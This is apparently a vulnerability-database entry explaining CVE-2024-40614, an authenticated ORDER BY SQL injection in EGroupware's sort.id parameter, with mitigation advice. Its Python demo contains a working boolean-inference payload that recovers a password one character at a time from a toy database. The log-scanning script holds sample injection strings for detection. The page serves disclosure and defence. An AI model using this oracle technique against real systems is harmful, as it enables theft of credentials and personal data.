CVE-2024-40614: n/a
EGroupware before 23.1.20240624 mishandles an ORDER BY clause. This leads to json.php?menuaction=EGroupware\Api\Etemplate\Widget\Nextmatch::ajax_get_rows sort.id SQL injection by authenticated users for Address Book or InfoLog sorting.
AI Analysis
Technical Summary
CVE-2024-40614 is a SQL injection vulnerability in EGroupware, an open-source groupware suite used for collaboration and information management. It affects versions before 23.1.20240624 and sits in the handling of the ORDER BY clause in the ajax_get_rows method of the Nextmatch widget, which sorts the row lists of the Address Book and InfoLog modules. The client-supplied sort.id parameter, sent with a json.php request whose menuaction is EGroupware\Api\Etemplate\Widget\Nextmatch::ajax_get_rows, is not adequately validated before it is placed in the ORDER BY clause. A column name in ORDER BY cannot be passed as a bound parameter, so the usual prepared-statement defence does not apply; the sort identifier has to be checked against the list of columns the view actually offers, and the direction reduced to ASC or DESC, before either reaches the query. Because the injected expression controls the sort order rather than the selected columns, an attacker typically extracts data by inference: the row order is made to depend on a condition over other tables, and the answer is read from the order in which rows come back. Exploitation requires a valid EGroupware account. The CVSS v3.1 base score is 6.5 (medium), corresponding to a network attack vector, low attack complexity, low privileges required, no user interaction, and high confidentiality impact with no impact on integrity or availability. No public exploit code or active exploitation had been reported at the time of this analysis. The fixed version, 23.1.20240624, is named in the description; the record carries no separate patch link, so follow the official EGroupware release channels for the update.
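The following Python script is an added illustration of the bug class described above, not EGroupware's code, not its schema, and not a payload for it. It builds a constructed SQLite database (the table names, column names and the secret value are assumptions for the demonstration), contrasts the vulnerable pattern of interpolating a client-supplied sort id into ORDER BY with an allowlist-checked version, and shows why ORDER BY injection leaks data even though only the sort order is attacker-controlled: a CASE expression in the sort key turns a condition over another table into an observable row order, which is enough to recover a value one character at a time.

```python
import sqlite3

# Constructed toy schema standing in for a groupware database. The table and
# column names are assumptions for this illustration, not EGroupware's schema.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE contacts (id INTEGER PRIMARY KEY, n_given TEXT, n_family TEXT);
        INSERT INTO contacts VALUES (1, 'Ada', 'Lovelace'), (2, 'Bob', 'Mallory'), (3, 'Cy', 'Zed');
        CREATE TABLE accounts (account_id INTEGER PRIMARY KEY, account_pwd TEXT);
        INSERT INTO accounts VALUES (1, 's3cret');
    """)
    return con

# Vulnerable pattern: the client-supplied sort id is pasted straight into ORDER BY.
# A bound parameter would not help here: "ORDER BY ?" sorts by a constant string.
def rows_vulnerable(con, sort_id, asc=True):
    sql = f"SELECT id, n_given FROM contacts ORDER BY {sort_id} {'ASC' if asc else 'DESC'}"
    return [row[0] for row in con.execute(sql)]

# Fixed pattern: the sort id must be one of the columns the view actually offers,
# and the direction is reduced to one of two fixed keywords before interpolation.
ALLOWED_SORT_COLUMNS = frozenset({"id", "n_given", "n_family"})

def rows_fixed(con, sort_id, asc=True):
    if sort_id not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"rejected sort column {sort_id!r}")
    sql = f'SELECT id, n_given FROM contacts ORDER BY "{sort_id}" {"ASC" if asc else "DESC"}'
    return [row[0] for row in con.execute(sql)]

# Boolean-based inference through ORDER BY: the sort key flips between id and -id
# depending on a condition over a table the caller was never meant to read.
def oracle_payload(prefix):
    return (f"(CASE WHEN (SELECT account_pwd FROM accounts WHERE account_id = 1) "
            f"LIKE '{prefix}%' THEN id ELSE -id END)")

# Recover the secret character by character by watching the returned row order.
def leak_secret(con, alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=8):
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            if rows_vulnerable(con, oracle_payload(known + ch)) == [1, 2, 3]:
                known += ch
                break
        else:
            return known  # no character extends the prefix: the secret is fully recovered
    return known

if __name__ == "__main__":
    db = build_db()
    print("vulnerable sort leaks:", leak_secret(db))
    try:
        rows_fixed(db, oracle_payload(""))
    except ValueError as err:
        print("fixed sort rejects payload:", err)
```

The allowlist is the essential part of the fix: quoting the identifier in rows_fixed guards against a typo in the allowlist, but on its own it would not stop an attacker, because the check that matters is that the value is a known column name at all.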
Potential Impact
For European organizations using EGroupware for internal communication, contact management, or logging, this vulnerability poses a risk of unauthorized data disclosure. Attackers with valid user credentials could exploit the flaw to extract sensitive information from Address Book or InfoLog databases, potentially exposing personal data, business contacts, or confidential logs. This could lead to privacy violations under GDPR, reputational damage, and potential regulatory penalties. Since the vulnerability requires authentication, the risk is somewhat mitigated by internal access controls, but insider threats or compromised accounts increase exposure. The lack of impact on data integrity or availability reduces the risk of service disruption or data manipulation. However, the confidentiality breach alone is significant for organizations handling sensitive or regulated data.
Mitigation Recommendations
European organizations should verify the installed EGroupware version and upgrade to 23.1.20240624 or later; the fix is in that release. Until the upgrade is done, restrict EGroupware to trusted users and networks, enforce strong authentication including multi-factor authentication so that the account the attack requires is harder to obtain, and review logs for unusual json.php activity. Note that the sort.id value travels in the POST body of the ajax call rather than in the query string, so a default web-server access log shows only the menuaction; body-level or application logging is needed to see the sort parameter itself. A web application firewall with SQL injection rules can block obvious payloads, but the most reliable rule for this parameter is a positive one: a legitimate sort id is a plain column identifier, so anything containing parentheses, quotes, spaces, commas, semicolons or comment sequences can be rejected outright. Conduct regular security audits and penetration testing focused on authenticated input handling, especially sort, filter and pagination parameters that end up interpolated into SQL. Educate users about credential sharing and phishing to reduce the chance of account compromise. Finally, keep backups current and an incident response plan ready so that a potential data breach can be handled quickly.
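As an added detection example (not from the page or from the EGroupware project), the script below applies the positive rule from the previous paragraph to request logs. It assumes a log that records the JSON body of each json.php call, since a standard access log would not contain sort.id; the line format, the nested sort/id layout of the body, and the sample lines themselves are constructed for the example. Requests are matched on the menuaction from the advisory after URL decoding, and any sort id that is not a bare, optionally table-qualified column identifier is reported together with the account that sent it.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# The menuaction named in the advisory; requests are matched on it after URL decoding.
TARGET_MENUACTION = r"EGroupware\Api\Etemplate\Widget\Nextmatch::ajax_get_rows"

# A legitimate sort id is a bare column identifier, optionally table-qualified.
SAFE_SORT_ID = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$")

# Constructed log line format (an assumption): client, user, request line, status,
# then the raw JSON request body. The {"sort": {"id": ...}} body layout is also assumed.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<user>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) body=(?P<body>.*)$'
)

# Constructed sample lines: two benign sorts, one unrelated page load, two injection attempts.
SAMPLE_LOG = [
    '10.0.0.5 alice "POST /egroupware/json.php?menuaction=EGroupware%5CApi%5CEtemplate%5CWidget%5CNextmatch%3A%3Aajax_get_rows HTTP/1.1" 200 body={"sort":{"id":"n_family","asc":true}}',
    '10.0.0.5 alice "POST /egroupware/json.php?menuaction=EGroupware%5CApi%5CEtemplate%5CWidget%5CNextmatch%3A%3Aajax_get_rows HTTP/1.1" 200 body={"sort":{"id":"(CASE WHEN (SELECT 1) THEN 1 ELSE 2 END)","asc":true}}',
    '10.0.0.9 bob "GET /egroupware/index.php?menuaction=addressbook.addressbook_ui.index HTTP/1.1" 200 body=',
    '10.0.0.9 bob "POST /egroupware/json.php?menuaction=EGroupware%5CApi%5CEtemplate%5CWidget%5CNextmatch%3A%3Aajax_get_rows HTTP/1.1" 200 body={"sort":{"id":"contacts.n_family","asc":false}}',
    '10.0.0.9 bob "POST /egroupware/json.php?menuaction=EGroupware%5CApi%5CEtemplate%5CWidget%5CNextmatch%3A%3Aajax_get_rows HTTP/1.1" 200 body={"sort":{"id":"n_family, (SELECT 1)","asc":true}}',
]

def is_nextmatch_request(target):
    # parse_qs percent-decodes the value, so %5C becomes a backslash before comparison.
    query = parse_qs(urlsplit(target).query)
    return TARGET_MENUACTION in query.get("menuaction", [])

def find_sort_ids(node, found=None):
    # Walk the decoded body and collect every sort -> id string, wherever it is nested.
    if found is None:
        found = []
    if isinstance(node, dict):
        sort = node.get("sort")
        if isinstance(sort, dict) and isinstance(sort.get("id"), str):
            found.append(sort["id"])
        for value in node.values():
            find_sort_ids(value, found)
    elif isinstance(node, list):
        for value in node:
            find_sort_ids(value, found)
    return found

def scan(lines):
    # Returns (user, sort_id) for every Nextmatch request whose sort id is not a plain identifier.
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not is_nextmatch_request(m["target"]):
            continue
        try:
            body = json.loads(m["body"])
        except json.JSONDecodeError:
            alerts.append((m["user"], "<unparseable body>"))
            continue
        for sort_id in find_sort_ids(body):
            if not SAFE_SORT_ID.match(sort_id):
                alerts.append((m["user"], sort_id))
    return alerts

if __name__ == "__main__":
    for user, value in scan(SAMPLE_LOG):
        print(f"suspicious sort.id from {user}: {value}")
```

The same identifier pattern can be used as a WAF rule on the request body: rather than enumerating SQL keywords, reject any sort id that does not match the pattern, which catches payloads that generic injection signatures miss.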
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Belgium
Technical Details
- Data Version: 5.2
- Assigner Short Name: mitre
- Date Reserved: 2024-07-07T00:00:00.000Z
- Cvss Version: 3.1
- State: PUBLISHED
Threat ID: 6925be8c5b1d823317eaa228
Added to database: 11/25/2025, 2:34:52 PM
Last enriched: 11/25/2025, 2:35:32 PM
Last updated: 11/25/2025, 5:32:58 PM